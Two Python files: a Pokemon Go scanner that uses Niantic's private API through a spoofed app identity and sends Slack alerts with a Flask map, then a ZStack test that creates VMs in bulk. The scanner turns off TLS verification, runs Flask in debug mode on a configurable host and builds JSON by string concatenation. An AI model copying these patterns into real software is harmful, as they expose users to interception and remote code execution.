# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import codecs
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import functools
import math
import time
import httplib
import urllib
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime, timedelta
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
from math import radians, cos, sin, asin, sqrt
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
spotted_pokemon = {}
max_idle_time = timedelta(seconds=300)
api_last_response = datetime.now() - 2 * max_idle_time
wait_to_reconnect = 60
# stuff for in-background search thread
search_thread = None
class memoized(object):
"""Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
fn = functools.partial(self.__call__, obj)
fn.reset = self._reset
return fn
def _reset(self):
self.cache = {}
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def lonlat_to_meters(lat1, lon1, lat2, lon2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
# earth radius in meters: 6378100
m = 6378100 * c
return m
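# Example (illustrative): one degree of latitude spans roughly 111 km, so
# lonlat_to_meters(0.0, 0.0, 1.0, 0.0) returns approximately 111,319 meters.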
def bearing_degrees(lat1, lon1, lat2, lon2):
"""
    Calculate the bearing in degrees from the user's location to the Pokemon's location.
:param lat1: user location latitude
:param lon1: user location longitude
:param lat2: pokemon location latitude
:param lon2: pokemon location longitude
:return: bearing degrees
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# calculate the angle
dlon = lon2 - lon1
dlat = lat2 - lat1
x = math.sin(dlon) * math.cos(lat2)
y = math.cos(lat1) * math.sin(lat2) - (math.sin(lat1) * math.cos(lat2) * math.cos(dlon))
initial_bearing = math.atan2(x, y)
initial_bearing = math.degrees(initial_bearing)
bearing = (initial_bearing + 360) % 360
bearing = int(bearing)
return bearing
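# Example (illustrative): a Pokemon due east of the user, e.g.
# bearing_degrees(0, 0, 0, 1), yields a bearing of 90 degrees.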
def bearing_degrees_to_compass_direction(bearing):
"""
    Converts bearing degrees into an easy-to-read compass direction (north, northeast, east, etc.)
:param bearing: bearing in degrees
:return: North, Northeast, East, etc
"""
if bearing >= 0 and bearing < 23:
direction = 'north'
elif bearing >= 23 and bearing < 68:
direction = 'northeast'
elif bearing >= 68 and bearing < 113:
direction = 'east'
elif bearing >= 113 and bearing < 158:
direction = 'southeast'
elif bearing >= 158 and bearing < 203:
direction = 'south'
elif bearing >= 203 and bearing < 248:
direction = 'southwest'
elif bearing >= 248 and bearing < 293:
direction = 'west'
elif bearing >= 293 and bearing < 338:
direction = 'northwest'
elif bearing >= 338 and bearing <= 360:
direction = 'north'
return direction
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
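# Example (illustrative): f2i/f2h reinterpret a double's bit pattern as an
# unsigned 64-bit integer, so h2f(f2h(40.7128)) round-trips back to 40.7128.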
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
            debug(
                'get_api_endpoint: retrying_get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if True: # global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def send_to_slack(text, username, icon_emoji, webhook):
values = {'payload': '{"username": "' + username + '", '
'"icon_emoji": "' + icon_emoji + '", '
'"text": "' + text + '"}'
}
str_values = {}
for k, v in values.items():
str_values[k] = unicode(v).encode('utf-8')
data = urllib.urlencode(str_values)
h = httplib.HTTPSConnection('hooks.slack.com')
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
h.request('POST', webhook, data, headers)
r = h.getresponse()
ack = r.read()
#print data
#print ack
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
parser.add_argument('-sw', '--slack-webhook', help='slack webhook urlpath /services/.../../...', required=True)
    parser.add_argument('-r', '--range', help='max range of pokemon for notifications in meters', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-pi',
'--pokemon-icons',
help='If you have pokemon emojis in Slack, you can give the prefix here, e.g.: \':\' if your emojis are named' +
':pokename:, \':pokemon-:\' if they are named :pokemon-pokename:. :pokeball: is default.',
default=':pokeball:')
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
class connection:
@memoized
def login(self, args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
codecs.open(path + '/locales/pokemon.' + args.locale + '.json', "r", 'UTF-8'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
global api_last_response
if datetime.now() - api_last_response > max_idle_time:
print 'resetting connection...'
connection.login.reset()
time.sleep(wait_to_reconnect)
global api_endpoint, access_token, profile_response
api_endpoint, access_token, profile_response = connection.login(args)
api_last_response = datetime.now()
clear_stale_pokemons()
steplimit = int(args.step_limit)
global max_distance
max_distance = int(args.range)
global slack_webhook_urlpath
slack_webhook_urlpath = str(args.slack_webhook)
global pokemon_icons_prefix
if args.pokemon_icons:
pokemon_icons_prefix = args.pokemon_icons
else:
pokemon_icons_prefix = False
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
                    hash = wild.SpawnPointId
                    if hash not in seen or seen[hash] <= wild.TimeTillHiddenMs:
                        visible.append(wild)
                        seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
if poke.SpawnPointId in spotted_pokemon.keys():
if spotted_pokemon[poke.SpawnPointId]['disappear_datetime'] > datetime.now():
continue
if poke.TimeTillHiddenMs < 0:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
disappear_datetime = datetime.fromtimestamp(disappear_timestamp)
distance = lonlat_to_meters(origin_lat, origin_lon, poke.Latitude, poke.Longitude)
if distance < max_distance:
time_till_disappears = disappear_datetime - datetime.now()
disappear_hours, disappear_remainder = divmod(time_till_disappears.seconds, 3600)
disappear_minutes, disappear_seconds = divmod(disappear_remainder, 60)
disappear_minutes = str(disappear_minutes)
disappear_seconds = str(disappear_seconds)
if len(disappear_seconds) == 1:
disappear_seconds = str(0) + disappear_seconds
disappear_datetime_local = disappear_datetime - timedelta(hours=4)
disappear_time = disappear_datetime_local.strftime("%H:%M:%S")
# calculate direction of Pokemon in bearing degrees
direction = bearing_degrees(origin_lat, origin_lon, poke.Latitude, poke.Longitude)
# transform in compass direction
direction = bearing_degrees_to_compass_direction(direction)
alert_text = 'I\'m just <https://pokevision.com/#/@' + str(poke.Latitude) + ',' + str(poke.Longitude) + \
'|' + "{0:.2f}".format(distance) + \
' m> ' + direction + ' until ' + disappear_time + \
' (' + disappear_minutes + ':' + disappear_seconds + ')!'
if pokemon_icons_prefix != ':pokeball:':
user_icon = pokemon_icons_prefix + pokename.lower() + ':'
else:
user_icon = ':pokeball:'
send_to_slack(alert_text, pokename, user_icon, slack_webhook_urlpath)
spotted_pokemon[poke.SpawnPointId] = {'disappear_datetime': disappear_datetime, 'pokename': pokename}
# print(r.status_code, r.reason)
global api_last_response
api_last_response = datetime.now()
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='17', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
test_crt_basic_l3_vm_with_given_num.py
|
'''
New Perf Test for creating KVM VM with basic L3 network.
The created number will depend on the environment variable: ZSTACK_VM_NUM
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
import threading
import random
session_uuid = None
session_to = None
session_mc = None
def test():
global session_uuid
global session_to
global session_mc
vm_num = os.environ.get('ZSTACK_VM_NUM')
if not vm_num:
vm_num = 0
else:
vm_num = int(vm_num)
org_num = vm_num
vm_creation_option = test_util.VmOption()
image_name = os.environ.get('imageName_s')
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_name = os.environ.get('l3PublicNetworkName')
session_uuid = acc_ops.login_as_admin()
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
l3s = test_lib.lib_get_l3s()
conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)[0].uuid
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_session_uuid(session_uuid)
vm = test_vm_header.ZstackTestVm()
random_name = random.random()
vm_name = 'multihost_basic_vm_%s' % str(random_name)
vm_creation_option.set_name(vm_name)
while vm_num > 0:
vm_creation_option.set_l3_uuids([random.choice(l3s).uuid])
vm.set_creation_option(vm_creation_option)
vm_num -= 1
thread = threading.Thread(target=vm.create)
thread.start()
while threading.active_count() > 1:
time.sleep(0.01)
